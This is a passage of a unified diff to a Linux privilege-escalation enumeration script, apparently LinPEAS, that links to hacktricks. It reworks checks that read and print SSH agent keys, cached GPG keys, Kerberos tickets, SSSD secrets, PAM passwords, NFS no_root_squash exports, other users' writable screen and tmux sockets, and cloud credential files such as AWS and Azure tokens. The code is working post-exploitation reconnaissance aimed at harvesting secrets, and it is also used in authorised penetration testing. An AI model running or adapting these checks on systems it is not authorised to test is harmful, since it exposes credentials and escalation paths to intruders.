"$PSTORAGE_CERTSBIN" ]; then + print_3title "Some certificates were found (out limited):" + printf "$certsb4_grep\n" | head -n 20 + printf "$$PSTORAGE_CERTSBIN\n" | head -n 20 + echo "" +fi +if [ "$PSTORAGE_CERTSCLIENT" ]; then + print_3title "Some client certificates were found:" + printf "$PSTORAGE_CERTSCLIENT\n" + echo "" +fi +if [ "$PSTORAGE_SSH_AGENTS" ]; then + print_3title "Some SSH Agent files were found:" + printf "$PSTORAGE_SSH_AGENTS\n" + echo "" +fi +if ssh-add -l 2>/dev/null | grep -qv 'no identities'; then + print_3title "Listing SSH Agents" + ssh-add -l + echo "" +fi +if gpg-connect-agent "keyinfo --list" /bye | grep "D - - 1"; then + print_3title "Listing gpg keys cached in gpg-agent" + gpg-connect-agent "keyinfo --list" /bye + echo "" +fi +if [ "$writable_agents" ]; then + print_3title "Writable ssh and gpg agents" + printf "%s\n" "$writable_agents" +fi +if [ "$PSTORAGE_SSH_CONFIG" ]; then + print_3title "Some home ssh config file was found" + printf "%s\n" "$PSTORAGE_SSH_CONFIG" | while read f; do ls "$f" | sed -${E} "s,$f,${SED_RED},"; cat "$f" 2>/dev/null | grep -Iv "^$" | grep -v "^#" | sed -${E} "s,User|ProxyCommand,${SED_RED},"; done + echo "" +fi +if [ "$hostsdenied" ]; then + print_3title "/etc/hosts.denied file found, read the rules:" + printf "$hostsdenied\n" + cat "/etc/hosts.denied" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_GREEN}," + echo "" +fi +if [ "$hostsallow" ]; then + print_3title "/etc/hosts.allow file found, trying to read the rules:" + printf "$hostsallow\n" + cat "/etc/hosts.allow" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_RED}," + echo "" +fi +if [ "$sshconfig" ]; then + echo "" + echo "Searching inside /etc/ssh/ssh_config for interesting info" + grep -v "^#" /etc/ssh/ssh_config 2>/dev/null | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed -${E} "s,Host|ForwardAgent|User|ProxyCommand,${SED_RED}," +fi +echo "" + +if [ "$PSTORAGE_PAM_AUTH" ] || [ "$DEBUG" ]; then + print_2title "Analyzing PAM Auth Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_PAM_AUTH\" | grep -E \"pam\.d$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "pam.d"; fi; fi; printf "%s" "$PSTORAGE_PAM_AUTH" | grep -E "pam\.d$" | while read f; do ls -ld "$f" | sed -${E} "s,pam\.d$,${SED_RED},"; find "$f" -name "sshd" | while read ff; do ls -ld "$ff" | sed -${E} "s,sshd,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E -i "auth" | grep -Ev "^#|^@" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo ""; +fi + + +#-- SI) Passwords inside pam.d +pamdpass=$(grep -Ri "passwd" /etc/pam.d/ 2>/dev/null | grep -v ":#") +if [ "$pamdpass" ] || [ "$DEBUG" ]; then + print_2title "Passwords inside pam.d" + grep -Ri "passwd" /etc/pam.d/ 2>/dev/null | grep -v ":#" | sed "s,passwd,${SED_RED}," + echo "" +fi + +if [ "$PSTORAGE_NFS_EXPORTS" ] || [ "$DEBUG" ]; then + print_2title "Analyzing NFS Exports Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_NFS_EXPORTS\" | grep -E \"exports$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "exports"; fi; fi; printf "%s" "$PSTORAGE_NFS_EXPORTS" | grep -E "exports$" | while read f; do ls -ld "$f" | sed -${E} "s,exports$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,insecure,${SED_RED},g" | sed -${E} "s,no_root_squash|no_all_squash,${SED_RED_YELLOW},g"; done; echo ""; +fi + + +#-- SI) Kerberos +kadmin_exists="$(command -v kadmin)" +klist_exists="$(command -v klist)" +if [ "$kadmin_exists" ] || [ "$klist_exists" ] || [ "$PSTORAGE_KERBEROS" ] || [ "$DEBUG" ]; then print_2title "Searching kerberos conf files and tickets" - print_info "https://book.hacktricks.xyz/pentesting/pentesting-kerberos-88#pass-the-ticket-ptt" - kadmin_exists="$(command -v kadmin)" - klist_exists="$(command -v klist)" + print_info "http://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-active-directory" + if [ "$kadmin_exists" ]; then echo "kadmin was found on $kadmin_exists" | sed "s,$kadmin_exists,${SED_RED},"; fi if [ "$klist_exists" ] && [ -x "$klist_exists" ]; then echo "klist execution"; klist; fi + ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)" + if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "ptrace protection is disabled (0), you might find tickets inside processes memory" | sed "s,is disabled,${SED_RED},g"; + else echo "ptrace protection is enabled ($ptrace_scope), you need to disable it to search for tickets inside processes memory" | sed "s,is enabled,${SED_GREEN},g"; + fi printf "%s\n" "$PSTORAGE_KERBEROS" | while read f; do if [ -r "$f" ]; then @@ -2609,10 +2819,19 @@ if echo $CHECKS | grep -q SofI; then done elif echo "$f" | grep -q krb5.conf; then ls -l "$f" - cat "$f" 2>/dev/null | grep default_ccache_name | sed -${E} "s,default_ccache_name,${SED_RED},"; + cat "$f" 2>/dev/null | sed -${E} "s,default_ccache_name,${SED_RED},"; elif echo "$f" | grep -q kadm5.acl; then - ls -l "$f" + ls -l "$f" cat "$f" 2>/dev/null + elif echo "$f" | grep -q sssd.conf; then + ls -l "$f" + cat "$f" 2>/dev/null | sed -${E} "s,cache_credentials ?= ?[tT][rR][uU][eE],${SED_RED},"; + elif echo "$f" | grep -q secrets.ldb; then + echo "You could use SSSDKCMExtractor to extract the tickets stored here" | sed -${E} "s,SSSDKCMExtractor,${SED_RED},"; + ls -l "$f" + elif echo "$f" | grep -q .secrets.mkey; then + echo "This is the secrets file to use with SSSDKCMExtractor" | sed -${E} "s,SSSDKCMExtractor,${SED_RED},"; + ls -l "$f" fi fi done @@ -2620,168 +2839,215 @@ if echo $CHECKS | grep -q SofI; then klist 2>/dev/null || echo_not_found "klist" echo "" - print_2title "Analyzing Knockd Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_KNOCKD\" | grep -E \"knockd.*$\"`" ]; then echo_not_found "*knockd*"; fi; printf "%s" "$PSTORAGE_KNOCKD" | grep -E "knockd.*$" | while read f; do ls -ld "$f" | sed -${E} "s,knockd.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; +fi + +if [ "$PSTORAGE_KNOCKD" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Knockd Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_KNOCKD\" | grep -E \"knockd.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*knockd*"; fi; fi; printf "%s" "$PSTORAGE_KNOCKD" | grep -E "knockd.*$" | while read f; do ls -ld "$f" | sed -${E} "s,knockd.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; +fi - print_2title "Analyzing Kibana Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_KIBANA\" | grep -E \"kibana\.y.*ml$\"`" ]; then echo_not_found "kibana.y*ml"; fi; printf "%s" "$PSTORAGE_KIBANA" | grep -E "kibana\.y.*ml$" | while read f; do ls -ld "$f" | sed -${E} "s,kibana\.y.*ml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#|^[[:space:]]*$" | sed -${E} "s,username|password|host|port|elasticsearch|ssl,${SED_RED},g"; done; echo ""; +if [ "$PSTORAGE_KIBANA" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Kibana Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_KIBANA\" | grep -E \"kibana\.y.*ml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "kibana.y*ml"; fi; fi; printf "%s" "$PSTORAGE_KIBANA" | grep -E "kibana\.y.*ml$" | while read f; do ls -ld "$f" | sed -${E} "s,kibana\.y.*ml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#|^[[:space:]]*$" | sed -${E} "s,username|password|host|port|elasticsearch|ssl,${SED_RED},g"; done; echo ""; +fi - print_2title "Analyzing Elasticsearch Files (limit 70)" +if [ "$PSTORAGE_ELASTICSEARCH" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Elasticsearch Files (limit 70)" echo "The version is $(curl -X GET '127.0.0.1:9200' 2>/dev/null | grep number | cut -d ':' -f 2)" - if ! [ "`echo \"$PSTORAGE_ELASTICSEARCH\" | grep -E \"elasticsearch\.y.*ml$\"`" ]; then echo_not_found "elasticsearch.y*ml"; fi; printf "%s" "$PSTORAGE_ELASTICSEARCH" | grep -E "elasticsearch\.y.*ml$" | while read f; do ls -ld "$f" | sed -${E} "s,elasticsearch\.y.*ml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "path.data|path.logs|cluster.name|node.name|network.host|discovery.zen.ping.unicast.hosts" | grep -Ev "\W+\#|^#"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_ELASTICSEARCH\" | grep -E \"elasticsearch\.y.*ml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "elasticsearch.y*ml"; fi; fi; printf "%s" "$PSTORAGE_ELASTICSEARCH" | grep -E "elasticsearch\.y.*ml$" | while read f; do ls -ld "$f" | sed -${E} "s,elasticsearch\.y.*ml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "path.data|path.logs|cluster.name|node.name|network.host|discovery.zen.ping.unicast.hosts" | grep -Ev "\W+\#|^#"; done; echo ""; +fi - ##-- SI) Logstash +##-- SI) Logstash +if [ "$PSTORAGE_LOGSTASH" ] || [ "$DEBUG" ]; then print_2title "Searching logstash files" - if [ "$PSTORAGE_LOGSTASH" ]; then - printf "$PSTORAGE_LOGSTASH\n" - printf "%s\n" "$PSTORAGE_LOGSTASH" | while read d; do - if [ -r "$d/startup.options" ]; then - echo "Logstash is running as user:" - cat "$d/startup.options" 2>/dev/null | grep "LS_USER\|LS_GROUP" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed -${E} "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,root,${SED_RED}," - fi - cat "$d/conf.d/out*" | grep "exec\s*{\|command\s*=>" | sed -${E} "s,exec\W*\{|command\W*=>,${SED_RED}," - cat "$d/conf.d/filt*" | grep "path\s*=>\|code\s*=>\|ruby\s*{" | sed -${E} "s,path\W*=>|code\W*=>|ruby\W*\{,${SED_RED}," - done - else echo_not_found - fi - echo "" + printf "$PSTORAGE_LOGSTASH" + printf "%s\n" "$PSTORAGE_LOGSTASH" | while read d; do + if [ -r "$d/startup.options" ]; then + echo "Logstash is running as user:" + cat "$d/startup.options" 2>/dev/null | grep "LS_USER\|LS_GROUP" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed -${E} "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,root,${SED_RED}," + fi + cat "$d/conf.d/out*" | grep "exec\s*{\|command\s*=>" | sed -${E} "s,exec\W*\{|command\W*=>,${SED_RED}," + cat "$d/conf.d/filt*" | grep "path\s*=>\|code\s*=>\|ruby\s*{" | sed -${E} "s,path\W*=>|code\W*=>|ruby\W*\{,${SED_RED}," + done +fi +echo "" - #-- SI) Vault-ssh +#-- SI) Vault-ssh +if [ "$PSTORAGE_VAULT_SSH_HELPER" ] || [ "$DEBUG" ]; then print_2title "Searching Vault-ssh files" - if [ "$PSTORAGE_VAULT_SSH_HELPER" ]; then - printf "$PSTORAGE_VAULT_SSH_HELPER\n" - printf "%s\n" "$PSTORAGE_VAULT_SSH_HELPER" | while read f; do cat "$f" 2>/dev/null; vault-ssh-helper -verify-only -config "$f" 2>/dev/null; done - echo "" - vault secrets list 2>/dev/null - printf "%s\n" "$PSTORAGE_VAULT_SSH_TOKEN" | sed -${E} "s,.*,${SED_RED}," 2>/dev/null - else echo_not_found "vault-ssh-helper.hcl" - fi + printf "$PSTORAGE_VAULT_SSH_HELPER\n" + printf "%s\n" "$PSTORAGE_VAULT_SSH_HELPER" | while read f; do cat "$f" 2>/dev/null; vault-ssh-helper -verify-only -config "$f" 2>/dev/null; done echo "" + vault secrets list 2>/dev/null + printf "%s\n" "$PSTORAGE_VAULT_SSH_TOKEN" | sed -${E} "s,.*,${SED_RED}," 2>/dev/null +fi +echo "" - #-- SI) Cached AD Hashes - adhashes=$(ls "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null) +#-- SI) Cached AD Hashes +adhashes=$(ls "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null) +if [ "$adhashes" ] || [ "$DEBUG" ]; then print_2title "Searching AD cached hashes" - if [ "$adhashes" ]; then - ls -l "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null - else echo_not_found "cached hashes" - fi + ls -l "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null echo "" +fi - #-- SI) Screen sessions +#-- SI) Screen sessions +if [ "$screensess" ] || [ "$screensess2" ] || [ "$DEBUG" ]; then print_2title "Searching screen sessions" print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions" screensess=$(screen -ls 2>/dev/null) - if [ "$screensess" ]; then - printf "$screensess" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,No Sockets found.*,${C}[32m&${C}[0m," - else echo_not_found "screen" - fi + screensess2=$(find /run/screen -type d -path "/run/screen/S-*" 2>/dev/null) + + screen -v + printf "$screensess\n$screensess2" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,No Sockets found.*,${C}[32m&${C}[0m," + + find /run/screen -type s -path "/run/screen/S-*" -not -user $USER '(' '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null | while read f; do + echo "Other user screen socket is writable: $f" | sed "s,$f,${SED_RED_YELLOW}," + done echo "" +fi - #-- SI) Tmux sessions - tmuxdefsess=$(tmux ls 2>/dev/null) - tmuxnondefsess=$(ps auxwww | grep "tmux " | grep -v grep) +#-- SI) Tmux sessions +tmuxdefsess=$(tmux ls 2>/dev/null) +tmuxnondefsess=$(ps auxwww | grep "tmux " | grep -v grep) +tmuxsess2=$(find /tmp -type d -path "/tmp/tmux-*" 2>/dev/null) +if [ "$tmuxdefsess" ] || [ "$tmuxnondefsess" ] || [ "$tmuxsess2" ] || [ "$DEBUG" ]; then print_2title "Searching tmux sessions"$N print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions" - if [ "$tmuxdefsess" ] || [ "$tmuxnondefsess" ]; then - printf "$tmuxdefsess\n$tmuxnondefsess\n" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,no server running on.*,${C}[32m&${C}[0m," - else echo_not_found "tmux" - fi + tmux -V + printf "$tmuxdefsess\n$tmuxnondefsess\n$tmuxsess2" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,no server running on.*,${C}[32m&${C}[0m," + + find /tmp -type s -path "/tmp/tmux*" -not -user $USER '(' '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null | while read f; do + echo "Other user tmux socket is writable: $f" | sed "s,$f,${SED_RED_YELLOW}," + done echo "" +fi - print_2title "Analyzing CouchDB Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_COUCHDB\" | grep -E \"couchdb$\"`" ]; then echo_not_found "couchdb"; fi; printf "%s" "$PSTORAGE_COUCHDB" | grep -E "couchdb$" | while read f; do ls -ld "$f" | sed -${E} "s,couchdb$,${SED_RED},"; for ff in $(find "$f" -name "local.ini"); do ls -ld "$ff" | sed -${E} "s,local.ini,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^;" | sed -${E} "s,admin.*|password.*|cert_file.*|key_file.*|hashed.*|pbkdf2.*,${SED_RED},g"; done; echo "";done; echo ""; +if [ "$PSTORAGE_COUCHDB" ] || [ "$DEBUG" ]; then + print_2title "Analyzing CouchDB Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_COUCHDB\" | grep -E \"couchdb$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "couchdb"; fi; fi; printf "%s" "$PSTORAGE_COUCHDB" | grep -E "couchdb$" | while read f; do ls -ld "$f" | sed -${E} "s,couchdb$,${SED_RED},"; find "$f" -name "local.ini" | while read ff; do ls -ld "$ff" | sed -${E} "s,local.ini,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^;" | sed -${E} "s,admin.*|password.*|cert_file.*|key_file.*|hashed.*|pbkdf2.*,${SED_RED},g"; done; echo "";done; echo ""; +fi - print_2title "Analyzing Redis Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_REDIS\" | grep -E \"redis\.conf$\"`" ]; then echo_not_found "redis.conf"; fi; printf "%s" "$PSTORAGE_REDIS" | grep -E "redis\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,redis\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,masterauth.*|requirepass.*,${SED_RED},g"; done; echo ""; +if [ "$PSTORAGE_REDIS" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Redis Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_REDIS\" | grep -E \"redis\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "redis.conf"; fi; fi; printf "%s" "$PSTORAGE_REDIS" | grep -E "redis\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,redis\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,masterauth.*|requirepass.*,${SED_RED},g"; done; echo ""; +fi - #-- SI) Dovecot - # Needs testing +#-- SI) Dovecot +# Needs testing +dovecotpass=$(grep -r "PLAIN" /etc/dovecot 2>/dev/null) +if [ "$dovecotpass" ] || [ "$DEBUG" ]; then print_2title "Searching dovecot files" - dovecotpass=$(grep -r "PLAIN" /etc/dovecot 2>/dev/null) - if [ -z "$dovecotpass" ]; then + if [ -z "$dovecotpass" ]; then echo_not_found "dovecot credentials" else - for d in $(grep -r "PLAIN" /etc/dovecot 2>/dev/null); do + printf "%s\n" "$dovecotpass" | while read d; do df=$(echo $d |cut -d ':' -f1) dp=$(echo $d |cut -d ':' -f2-) echo "Found possible PLAIN text creds in $df" echo "$dp" | sed -${E} "s,.*,${SED_RED}," 2>/dev/null - done - fi + done + fi echo "" +fi - print_2title "Analyzing Mosquitto Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_MOSQUITTO\" | grep -E \"mosquitto\.conf$\"`" ]; then echo_not_found "mosquitto.conf"; fi; printf "%s" "$PSTORAGE_MOSQUITTO" | grep -E "mosquitto\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,mosquitto\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,password_file.*|psk_file.*|allow_anonymous.*true|auth,${SED_RED},g"; done; echo ""; +if [ "$PSTORAGE_MOSQUITTO" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Mosquitto Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_MOSQUITTO\" | grep -E \"mosquitto\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "mosquitto.conf"; fi; fi; printf "%s" "$PSTORAGE_MOSQUITTO" | grep -E "mosquitto\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,mosquitto\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,password_file.*|psk_file.*|allow_anonymous.*true|auth,${SED_RED},g"; done; echo ""; +fi - print_2title "Analyzing Neo4j Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_NEO4J\" | grep -E \"neo4j$\"`" ]; then echo_not_found "neo4j"; fi; printf "%s" "$PSTORAGE_NEO4J" | grep -E "neo4j$" | while read f; do ls -ld "$f" | sed -${E} "s,neo4j$,${SED_RED},"; for ff in $(find "$f" -name "auth"); do ls -ld "$ff" | sed -${E} "s,auth,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo ""; +if [ "$PSTORAGE_NEO4J" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Neo4j Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_NEO4J\" | grep -E \"neo4j$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "neo4j"; fi; fi; printf "%s" "$PSTORAGE_NEO4J" | grep -E "neo4j$" | while read f; do ls -ld "$f" | sed -${E} "s,neo4j$,${SED_RED},"; find "$f" -name "auth" | while read ff; do ls -ld "$ff" | sed -${E} "s,auth,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo ""; +fi - print_2title "Analyzing Cloud Credentials Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"credentials$\"`" ]; then echo_not_found "credentials"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "credentials$" | while read f; do ls -ld "$f" | sed -${E} "s,credentials$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"credentials\.db$\"`" ]; then echo_not_found "credentials.db"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "credentials\.db$" | while read f; do ls -ld "$f" | sed -${E} "s,credentials\.db$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"legacy_credentials\.db$\"`" ]; then echo_not_found "legacy_credentials.db"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "legacy_credentials\.db$" | while read f; do ls -ld "$f" | sed -${E} "s,legacy_credentials\.db$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"access_tokens\.db$\"`" ]; then echo_not_found "access_tokens.db"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "access_tokens\.db$" | while read f; do ls -ld "$f" | sed -${E} "s,access_tokens\.db$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"access_tokens\.json$\"`" ]; then echo_not_found "access_tokens.json"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "access_tokens\.json$" | while read f; do ls -ld "$f" | sed -${E} "s,access_tokens\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"accessTokens\.json$\"`" ]; then echo_not_found "accessTokens.json"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "accessTokens\.json$" | while read f; do ls -ld "$f" | sed -${E} "s,accessTokens\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"azureProfile\.json$\"`" ]; then echo_not_found "azureProfile.json"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "azureProfile\.json$" | while read f; do ls -ld "$f" | sed -${E} "s,azureProfile\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"TokenCache\.dat$\"`" ]; then echo_not_found "TokenCache.dat"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "TokenCache\.dat$" | while read f; do ls -ld "$f" | sed -${E} "s,TokenCache\.dat$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"AzureRMContext\.json$\"`" ]; then echo_not_found "AzureRMContext.json"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "AzureRMContext\.json$" | while read f; do ls -ld "$f" | sed -${E} "s,AzureRMContext\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"\.bluemix$\"`" ]; then echo_not_found ".bluemix"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "\.bluemix$" | while read f; do ls -ld "$f" | sed -${E} "s,\.bluemix$,${SED_RED},"; for ff in $(find "$f" -name "config.json"); do ls -ld "$ff" | sed -${E} "s,config.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo ""; +if [ "$PSTORAGE_CLOUD_CREDENTIALS" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Cloud Credentials Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"credentials$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "credentials"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "credentials$" | while read f; do ls -ld "$f" | sed -${E} "s,credentials$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"credentials\.db$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "credentials.db"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "credentials\.db$" | while read f; do ls -ld "$f" | sed -${E} "s,credentials\.db$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"legacy_credentials\.db$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "legacy_credentials.db"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "legacy_credentials\.db$" | while read f; do ls -ld "$f" | sed -${E} "s,legacy_credentials\.db$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"access_tokens\.db$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "access_tokens.db"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "access_tokens\.db$" | while read f; do ls -ld "$f" | sed -${E} "s,access_tokens\.db$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"access_tokens\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "access_tokens.json"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "access_tokens\.json$" | while read f; do ls -ld "$f" | sed -${E} "s,access_tokens\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"accessTokens\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "accessTokens.json"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "accessTokens\.json$" | while read f; do ls -ld "$f" | sed -${E} "s,accessTokens\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"azureProfile\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "azureProfile.json"; fi; fi; printf "%s" 